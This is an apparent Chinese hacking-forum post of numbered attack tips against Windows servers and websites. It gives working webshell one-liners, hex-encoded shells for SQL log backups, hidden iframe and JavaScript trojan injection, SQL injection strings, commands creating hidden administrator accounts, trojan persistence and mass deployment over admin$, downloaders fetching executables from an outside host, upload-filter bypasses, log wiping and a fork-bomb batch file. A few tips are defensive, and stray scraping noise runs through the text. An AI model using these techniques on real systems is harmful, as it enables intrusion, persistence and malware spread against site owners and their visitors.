找回密码
 立即注册
查看: 2923|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 J" }1 y8 u1 J3 }/ x# o% F2 ?* Y; I
cacls C:\windows\system32 /G hqw20:R$ j7 w3 i4 M- R9 ?$ O5 C0 ]
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
) {4 j* `6 n# a6 c; ?恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
2 y: \8 i# K- T3 H: {$ J- a: s/ a5 E8 ^
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
- Z) S2 d9 Q' H. P4 V
# I+ B# z0 M" u5 ?, c$ z3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
) P7 i* S+ m$ s0 v# K/ ~/ p5 y% u9 C, `) ~1 \6 M5 {
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号4 ~) |( U' z( L/ |
4 i) M8 D# _) H- b) x+ W* y! o
5、利用INF文件来修改注册表0 }; l2 ~# _0 h& u
[Version]
% D) V  |9 K3 s  a- a0 ASignature="$CHICAGO$"
- ~" H$ g. @+ i, r[Defaultinstall]
. \! L/ g2 X: i- A, |: N4 `addREG=Ating5 n0 ^  U; p2 j& n" x7 q1 ?# U) r
[Ating]
- g) L/ J+ e. o5 c1 wHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
, B- W( B! v: j以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
8 j# P6 G& D2 D! Yrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
0 w7 P6 q: X' n1 Y8 m其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU7 F) j. P( Q3 a3 n9 {: ^
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
8 @! T9 n& z$ [" S3 v& w! [" SHKEY_CURRENT_CONFIG 简写为 HKCC
. a( `% e  N7 _9 |+ {4 F+ t0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值$ t* j3 \. q. F( Y
"1"这里代表是写入或删除注册表键值中的具体数据
$ _  j% P7 }4 E8 V( {& i" ^
: a2 l6 X8 m/ U/ f/ ]8 x6 x  E6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,, W: |1 J6 k" E) c$ [+ X* ?: Y
多了一步就是在防火墙里添加个端口,然后导出其键值
6 Z4 B3 E/ I$ x& e$ _4 H5 I" K[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
; F) S" e: B: y5 V- ^( I  H5 I
) z4 N# o4 h2 g7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽" ]' J4 P% C9 y% @
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
: ?7 q9 J8 Z, J2 z/ U6 R
7 g9 ~. P! m! i' Y4 i3 C8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
8 Z" |+ [9 s3 T0 T' I  ?, c
8 W7 ^7 n6 B' P9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,+ s1 q+ Z& \; W4 c  ~9 l5 u
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。' g2 a. l# w4 {. ]9 {

; O2 F' \2 t* B5 w10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”1 H1 q6 G; N. k$ ^: |

! E+ ]  \. k+ [11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
" t2 l/ B  Z3 W, [* |$ L用法:xsniff –pass –hide –log pass.txt
+ i  Y0 Q. W$ Q# k( E) Y5 h6 v* q/ O6 I
12、google搜索的艺术% N2 A2 W: j4 I) T
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”, U3 Z' X+ Z2 ]7 {) j
或“字符串的语法错误”可以找到很多sql注入漏洞。9 N% H$ o* c1 N! n' g4 a% }/ y
3 U- ]8 C( p0 F5 f1 z- D
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。+ J5 G  u# ?* R+ h7 g( @6 c# ]

: a6 t& Z. V0 n8 g& R# r: f8 l14、cmd中输入 nc –vv –l –p 1987
3 v  e  k2 A. e8 Z, u( i. {/ r; J做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃, _9 `6 `, B2 X+ o0 S# Q
9 d+ @0 D6 U7 I8 O  p
15、制作T++木马,先写个ating.hta文件,内容为& b! E, m# c* ]$ o1 Q4 @% E. j( `0 t
<script language="VBScript">0 F/ G3 ?! v* X# e3 _
set wshshell=createobject ("wscript.shell" )2 |  k" O8 Z2 H7 n/ O+ l+ ?
a=wshshell.run("你马的名称",1)
8 b1 x4 R9 }+ t* w. \0 k% hwindow.close
" l: T$ l( M* @, J( A4 U</script>
5 v4 K) q6 [- s0 |% W5 o7 Q再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
' N+ q0 J1 R$ D: m
2 N4 ^# ~8 Q. B: f( G/ J8 u16、搜索栏里输入' i) y  W. w! W9 V
关键字%'and 1=1 and '%'='
8 O; E, h; E9 K% G. t: _8 ^4 B. D关键字%'and 1=2 and '%'='
' N6 f. s2 e, L' Q$ v比较不同处 可以作为注入的特征字符9 Z% A6 F) c9 ~- h$ {
0 ]! ^& u! x* m) H. R
17、挂马代码<html>
) p& V8 L# y$ Y5 l$ [2 o$ V9 B* F<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>' _- l3 K8 ^& ]. K$ m( e
</html>/ F& P9 Y8 a* }( o- y6 ?
# g) o6 E% l* \8 i$ ~" n- X
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,5 [5 L) Y* T: a. C) h$ F: G
net localgroup administrators还是可以看出Guest是管理员来。
9 I- N) n% [& {2 n4 ?( _0 T1 `4 y  u3 k, }0 \) r  w
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等( i! M3 \, q" }0 a
用法: 安装: instsrv.exe 服务名称 路径+ |! _' J# j$ J5 w  ~. Y0 A
卸载: instsrv.exe 服务名称 REMOVE
1 L- u8 y- N$ }$ i* X8 c5 O: n, A# T  r

4 ^' y4 s& i; x* X21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
# o: Y( l& B' Y& Q+ Y) V不能注入时要第一时间想到%5c暴库。
6 V7 n  a& y5 K
  [& t- l7 R/ L1 R! @22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. `0 a; C4 d2 Q3 K0 e, K- g
9 V; R  r8 E' Q$ L
23、缺少xp_cmdshell时
& d) e5 H+ j8 I/ H尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'  K( g( Y$ P: O3 U8 O
假如恢复不成功,可以尝试直接加用户(针对开3389的)
: [/ `' u/ |3 p2 g9 s% fdeclare @o int1 O/ b9 a# E3 M
exec sp_oacreate 'wscript.shell',@o out
6 q* o8 ^0 F9 ]1 i3 `# cexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) c7 L8 S( Y6 h
2 Q, M3 c9 N7 T2 T) k* V24.批量种植木马.bat7 @, a5 t- J4 ~1 o+ X6 \) U6 [, n
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. o2 \1 ^% o8 O2 Ufor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 R1 ?4 ~8 m8 k* H9 x
扫描地址.txt里每个主机名一行 用\\开头
" l& I1 U5 t4 }$ N8 q5 x' w; Y& |6 o. m6 `
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
1 n2 ]# i' x- x
: D1 S' g4 O# |; m26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
3 W! K7 A# D" E+ k8 n! ~% a, V将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.0 Y1 E2 e' O$ {' A, ^5 ?1 Z
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
# ]) [$ i# {& x' r. S7 ~
/ V: i$ B) ^, a6 V, \/ K8 @1 n27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
# S" N% ^; e: _  l# }然后用#clear logg和#clear line vty *删除日志
9 W7 a5 `4 Q( g# o
) C9 o* o' ]' R1 e28、电脑坏了省去重新安装系统的方法) v1 T3 x- ?( n
纯dos下执行,
7 V( d9 O; n( W" U1 Nxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config: M- ^: Q: O! e6 s* |
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
* S, g  p# R9 D8 ?! F( Z  B
' U" P7 ]; I  U2 H+ [: `$ I4 O29、解决TCP/IP筛选 在注册表里有三处,分别是:
9 _6 U0 j5 R# T6 D" HHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip% T* \7 h9 |' {( a  H  d' S$ m
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
" h6 M( m" O% U+ U; `" WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip! r3 [& m7 `+ Q! I5 J; S
分别用! K2 Q# Y! J" I5 O
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
0 b6 P9 Q* K( `regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip( q  l. V/ d2 p* N0 g
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& g( m3 w: Q" H4 |% Q0 U命令来导出注册表项2 w; C6 O8 E4 c$ k: @8 {# f) S# m' ~, K
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
2 s; L5 r2 G/ V6 l" U% ^* R改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
3 ~: ?( [- R# c- v5 a; }: E. t, uregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。' z' C0 |$ O: {
! J0 i0 q) T$ {/ N: B4 X! ?
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U8 |, {' t& n5 _+ z# V: d
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3. V/ L1 n# q" V) j3 S8 y& A, M

5 a/ }  T; l- ?. W6 i8 q31、全手工打造开3389工具, V8 Z- V! u, N8 E$ c3 v# U
打开记事本,编辑内容如下:
: d3 f, j* ?' recho [Components] > c:\sql( I8 x7 W9 T! j( m: i+ z
echo TSEnable = on >> c:\sql
, w2 n5 e* W: Z/ j4 m& |7 j0 i6 Ksysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q, n- k0 E9 u9 [& N' e- Y" J5 p; z& E
编辑好后存为BAT文件,上传至肉鸡,执行- k5 c& d  W6 W2 _3 O. N" `! P

: B+ _5 L3 M7 w4 ^' \0 r  _2 o32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
( N. d5 X/ L9 b) v9 d
( I3 D& Q7 O5 c; J) Q7 Y: s33、让服务器重启
% C# x8 g; {  m2 {/ D写个bat死循环:
5 Z" H# u1 E1 ^; V" E8 D5 J! v9 \@echo off5 ?/ B% O* b6 }+ Y$ l1 L
:loop19 Z3 C6 I0 w" l/ U/ g3 @4 {6 j9 x
cls5 ^. N# t, {4 P
start cmd.exe& N4 w& N5 K8 w; D1 ?: o
goto loop12 r% G  b: H4 T# W  k. N
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启/ L& ^8 D; S/ V  e% d1 S' K/ `1 v
1 m) u" D7 H; }6 p3 ~- {+ C3 r
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; `# n0 X0 ?7 H0 G& j/ x# }7 [; ~: y@echo off
* `. _- U/ M3 Ldate /t >c:/3389.txt
1 P% _* Y( Q7 t# `! ~& ?- M+ Vtime /t >>c:/3389.txt
: t) l! V* I% }, U9 @; f5 X; A" yattrib +s +h c:/3389.bat
* w1 g" G/ R2 K3 P4 Dattrib +s +h c:/3389.txt6 m" c9 d3 R1 v5 d0 V( Z) i. q& h
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt3 R) n& B3 j) U0 e5 h9 d
并保存为3389.bat1 ?# U7 J7 |# i7 f7 b& T
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号  n3 r* Q! `4 W5 p) k* u

; o' U0 i; D9 L6 l7 Q1 x5 c35、有时候提不了权限的话,试试这个命令,在命令行里输入:8 c6 ?* o7 o  y$ p/ J% K
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)8 K3 w& \) m9 o9 K
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
5 k+ {% G& v; n$ }+ N7 Z( X% b0 l% B/ ^6 ?0 R
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件; q# W5 @# A" h/ a$ n2 [
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址& l% q  I( ]" h$ g9 ], f
echo 你的FTP账号 >>c:\1.bat //输入账号1 Z  v9 q! N6 y/ A5 O1 C
echo 你的FTP密码 >>c:\1.bat //输入密码$ B9 e/ }( u0 U, v- w
echo bin >>c:\1.bat //登入% H" B$ U: R$ M
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么  a+ p  i& Y) x, c. E" g' j( \2 y
echo bye >>c:\1.bat //退出* [5 f; ~& F6 ^
然后执行ftp -s:c:\1.bat即可
& j& G  u7 v) R% N8 j! W, Y, P4 z! U
37、修改注册表开3389两法8 k" [2 m, Q( T! h' M. Y! y) E5 F
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
# V- q9 `7 k" F$ t; g2 K9 Q/ lecho Windows Registry Editor Version 5.00 >>3389.reg
- L8 W4 z- \1 j& `; Fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
' ^% j2 \6 G: A- A2 v/ t& C- Becho "Enabled"="0" >>3389.reg
: R/ W5 j$ t+ A- w1 _/ q" hecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows! ?7 s4 f$ K! [- ~7 V) f# ^+ w8 j# e
NT\CurrentVersion\Winlogon] >>3389.reg% P, _9 e$ e2 @3 o% C( q! [0 O
echo "ShutdownWithoutLogon"="0" >>3389.reg/ d0 b9 B! j. W/ `6 |# x
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
/ \0 K. P* P, a1 R>>3389.reg( \3 n5 F7 }8 S. ~# u1 f- N
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg, f2 f4 }, B8 g' I* n7 X/ Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ Q, b: n. l& @6 V2 F& Y>>3389.reg' T7 v* ~1 F/ s  ~
echo "TSEnabled"=dword:00000001 >>3389.reg# w$ G0 ~! B; k# r- a! R0 P: h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg  [: w; w! \; Y- l" ?6 s9 m
echo "Start"=dword:00000002 >>3389.reg- P3 F# g( x& D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
' C. X0 G7 D4 b* d' h2 f; ?  L>>3389.reg# w* z5 f7 m: L
echo "Start"=dword:00000002 >>3389.reg9 ]: m: _1 }. |
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg! t: {: w( Q+ @" [9 ~
echo "Hotkey"="1" >>3389.reg- G2 e/ z- T; h$ l+ R& m1 F$ q0 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
- Z# W' G, J5 H# }* k  t! P5 KServer\Wds\rdpwd\Tds\tcp] >>3389.reg
0 N8 J6 F7 Q, k/ decho "PortNumber"=dword:00000D3D >>3389.reg1 z0 V3 _6 C% s7 t
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
# E4 _: B* ^% j( ^% ~  U6 n- Y" F' gServer\WinStations\RDP-Tcp] >>3389.reg; _! ?- m& S7 r/ c
echo "PortNumber"=dword:00000D3D >>3389.reg5 N! f0 n* T$ s6 o. j8 y
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
' G+ B$ T+ k3 t$ P! h# K6 N- x(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
( U! q) i7 f2 [+ A$ g4 O; b因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
. m8 t0 t3 Q- j" L7 M; _(2)winxp和win2003终端开启8 o- v6 r) M) y$ X
用以下ECHO代码写一个REG文件:
! g) ]6 [5 n8 f# H% fecho Windows Registry Editor Version 5.00>>3389.reg
1 m; h2 v6 l1 t+ Fecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
) v% F( x0 P4 k) v: Z2 u; }! cServer]>>3389.reg
4 C8 e% P7 J. ?9 B& D! Q( |echo "fDenyTSConnections"=dword:00000000>>3389.reg8 J' K' b& ]" L' y2 c
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal& k1 [. p- q5 J; z. R& Y" v9 A5 G. L
Server\Wds\rdpwd\Tds\tcp]>>3389.reg! E3 y* t1 v) _+ k& B) Y$ N, i
echo "PortNumber"=dword:00000d3d>>3389.reg
# o3 S5 X' X$ becho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 ^$ G; i$ S" F2 W+ ]
Server\WinStations\RDP-Tcp]>>3389.reg7 x, ]) z% _9 L0 `  c( {
echo "PortNumber"=dword:00000d3d>>3389.reg" m4 z+ g: b$ U) m8 }' B
然后regedit /s 3389.reg del 3389.reg7 p/ e) O/ z- Y3 E& \! c! x
XP下不论开终端还是改终端端口都不需重启9 b+ N' o% I( M5 S; x* k0 B/ n; o
3 v/ N  ^0 H; Z! e4 g- B0 B9 j
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
; A/ ]* C  O! J+ ?用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
9 m: j( g# B  a1 n+ V
( N; \! p% g: J39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!! |; [; S) ~  P
(1)数据库文件名应复杂并要有特殊字符1 \( X' K3 q. W+ ~+ g
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* O: r* J* b, o& \% q将conn.asp文档中的
* O, D1 O- D& I& c; `& n' e2 SDBPath = Server.MapPath("数据库.mdb")
/ w* }' i5 w0 ~; {, `& B5 R2 q- @conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath/ h7 M9 x" o5 I; ^/ L

* a8 p. L' o9 W( J" h$ q% L9 \修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置0 E8 \, o' z" g! T& m" I$ i
(3)不放在WEB目录里/ ^( L" q. D/ X/ g. S  {

9 n9 D, N  _! g  L+ R( u40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉4 u) h0 g1 l; n
可以写两个bat文件+ \$ K# h/ \* P* R
@echo off
+ S/ A8 w' w7 R8 u# G) t@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe: V0 Z" Y' i+ [/ L  Z
@del c:\winnt\system32\query.exe' e4 `. i# p* z: K' U/ p4 |
@del %SYSTEMROOT%\system32\dllcache\query.exe% ~% N! {/ x3 R' U5 H  ]
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的9 D8 g2 M. U6 B
+ o. R7 l: n1 p/ ^! B8 A. Y
@echo off
7 T7 R& a; p! T1 o@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
9 d; Q/ _/ u2 S! P8 C@del c:\winnt\system32\tsadmin.exe
- c7 P! T( W- Q, p8 @( G3 x@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex9 g! t) T; @7 d# Q  z

9 H$ d" s" s7 V5 N; b1 G41、映射对方盘符
3 A; e7 k. A/ W1 T$ _& atelnet到他的机器上,
5 l. w7 V% {1 mnet share 查看有没有默认共享 如果没有,那么就接着运行
$ j  r) e6 Y+ o  k4 X, Qnet share c$=c:% o, `" `& B; }1 s$ s. t
net share现在有c$- q- n, Z# j# c! K  P+ c
在自己的机器上运行
# e' U( _5 K& u% k2 ]net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 G# q" n5 n0 p- g" ]# x

3 p( y% z/ G+ C# C9 K# g42、一些很有用的老知识
3 H, s0 [  G1 @0 Y: [# V% mtype c:\boot.ini ( 查看系统版本 )" h3 j9 B3 [# P4 t% u
net start (查看已经启动的服务)
, @0 s- o' W2 o% k% W% j1 fquery user ( 查看当前终端连接 )# F: E# G& r' Z  P2 x& t
net user ( 查看当前用户 )
' r5 ]' `' k6 r7 h; B' c8 cnet user 用户 密码/add ( 建立账号 )
& w, N& G$ f% \* z7 Hnet localgroup administrators 用户 /add (提升某用户为管理员)3 M' Y% f% u2 x0 F0 _& K
ipconfig -all ( 查看IP什么的 )" C& Y' k5 C8 u9 i9 [
netstat -an ( 查看当前网络状态 )
  q/ M# F) X5 {6 b+ Hfindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)* _& y  l/ o! f# v( T* p$ I" Q2 T
克隆时Administrator对应1F46 r" c4 b5 b7 `# C1 R3 ]: j
guest对应1F5
" _: |: M: x& U9 ]5 stsinternetuser对应3E8
& E. ^- B: \4 U3 x( J: h# L/ F! L/ n1 Z1 ~  S# Y
43、如果对方没开3389,但是装了Remote Administrator Service1 B5 N' U, @* ^1 j9 q+ h
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
4 B7 c- J% O. a' e; d: m解释:用serv-u漏洞导入自己配制好的radmin的注册表信息! ~, W( M0 \7 F3 F% ^
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"& G2 L, B1 K' u! z0 J) [

5 c6 n0 ~4 V' s/ k0 w44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 B  f, O4 l" w4 `* a+ c: j) F本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
6 `7 ]; j; z! h; Q) i# f% Q( Q. O9 H; \) w, C
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)& S4 r# u( I7 i  r( v; Z# ~
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
3 f8 Y) C5 X. b, _) {! _^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 }! m1 B0 X! i4 T
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =, ~/ M. \! w, L4 q5 ^* E. P
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
6 R3 L6 x. ^; J8 p- O+ [! T(这是完整的一句话,其中没有换行符): c, s2 n- g4 u5 J
然后下载:
7 m3 k: |' n# ^- kcscript down.vbs http://www.hack520.org/hack.exe hack.exe
$ g% W0 I. E$ U. E7 j7 w2 x) ?  [
+ T( `1 F2 t2 e46、一句话木马成功依赖于两个条件:# |! f) [9 ~$ ^; R1 `: r
1、服务端没有禁止adodb.Stream或FSO组件
* N0 Y$ A0 ^6 a7 H0 k4 B2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。6 ?4 e! z9 d: t3 I' P

; w) t, N/ n- p- Q47、利用DB_OWNER权限进行手工备份一句话木马的代码:6 I) c6 ]( j2 B6 v) l$ b* H6 R
;alter database utsz set RECOVERY FULL--
* ^2 E, u  Q! w% {% Y5 b& m;create table cmd (a image)--5 j0 V2 W9 L. E6 R2 c
;backup log utsz to disk = 'D:\cmd' with init--
' l4 \, {8 b- t$ T/ V$ @! B;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--; j/ P) C/ h6 s+ G
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--* [$ Z+ D+ n, b
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
" U% J& H! ^0 z; x0 n) w) T
8 o) C+ U/ T" {' ~- Y( O4 [+ s48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:& ~' ^' }+ s9 _* E) Z' A# T' O
% }) k, L; a/ N- h! V) z
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ k  }; j* q5 I& X1 V
所有会话用 'all'。% l# q4 O- F. ^$ L
-s sessionid 列出会话的信息。
; ~% U- }1 R0 k( @' q; @# y* K-k sessionid 终止会话。9 M) G2 K( l4 }. d/ `) v5 n; u  ^
-m sessionid 发送消息到会话。; O; W% z4 Q+ P5 ^' C

+ ]2 T, J+ g5 c8 ~8 x; h4 aconfig 配置 telnet 服务器参数。& h" G0 q2 r4 C4 [* V; \& Z  \
! v5 Z  U$ q1 G" b  i) H7 {
common_options 为:4 z9 X1 j0 z& u- c
-u user 指定要使用其凭据的用户1 A* m# b4 c+ T& u) [/ y$ f$ X
-p password 用户密码, I3 C+ Y# Z4 E# b

9 ?  J! @' [% y! }( b0 F9 B$ _config_options 为:) F5 Q( P* I" r  y5 [
dom = domain 设定用户的默认域! R8 J# Z& f! _# o! h0 P: r% m2 f
ctrlakeymap = yes|no 设定 ALT 键的映射
4 u' A$ V( W/ t0 Ttimeout = hh:mm:ss 设定空闲会话超时值
, z1 d  {1 d8 h* v* z7 utimeoutactive = yes|no 启用空闲会话。
; m* S; F- A; p2 omaxfail = attempts 设定断开前失败的登录企图数。
; O' E* s' N* w6 ~) S+ wmaxconn = connections 设定最大连接数。
) K0 {# @+ o9 [5 pport = number 设定 telnet 端口。
. G6 P6 i2 m) i+ J0 O, Tsec = [+/-]NTLM [+/-]passwd
8 k; F, J& S' e# I设定身份验证机构8 C$ ?! {9 G2 q# ]9 \
fname = file 指定审计文件名。
# W- B; O/ G" \fsize = size 指定审计文件的最大尺寸(MB)。6 `6 f% k& i; G" P
mode = console|stream 指定操作模式。
+ c* ^2 k% @" m/ A/ k) @) rauditlocation = eventlog|file|both: O9 Q, \1 E  l8 o
指定记录地点8 w- \. E7 R& m; ^9 m
audit = [+/-]user [+/-]fail [+/-]admin
2 ~% X1 p  n: T& F7 \( z1 f3 M+ m: p
49、例如:在IE上访问:8 ~7 ]  }& K6 ~" g- ~" _
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
7 F' I3 J5 u& i* E4 O% u+ khack.txt里面的代码是:
$ V9 H# R6 b7 J- a2 y1 {9 t" {. W<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">: ^) q. x  g# D" a/ S# `
把这个hack.txt发到你空间就可以了!6 u. O9 f# B# w' r% n
这个可以利用来做网马哦!
$ R, X* q7 V' z3 ^
- ]  `0 X* r$ L% e9 T! D! S50、autorun的病毒可以通过手动限制!
% Z  }- p7 S6 C3 O. N1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!; s/ }0 v) z* |% N; ?- Y
2,打开盘符用右键打开!切忌双击盘符~6 k$ y5 I" K9 h& o' ^/ @
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
" A# r9 D+ ^1 {4 q1 p; ~4 X- w9 \$ q) d  y3 n/ c2 k, k6 l
51、log备份时的一句话木马:; p9 m# j. |; m7 z# E0 s
a).<%%25Execute(request("go"))%%25>& @" f5 q5 |: q# r
b).<%Execute(request("go"))%>
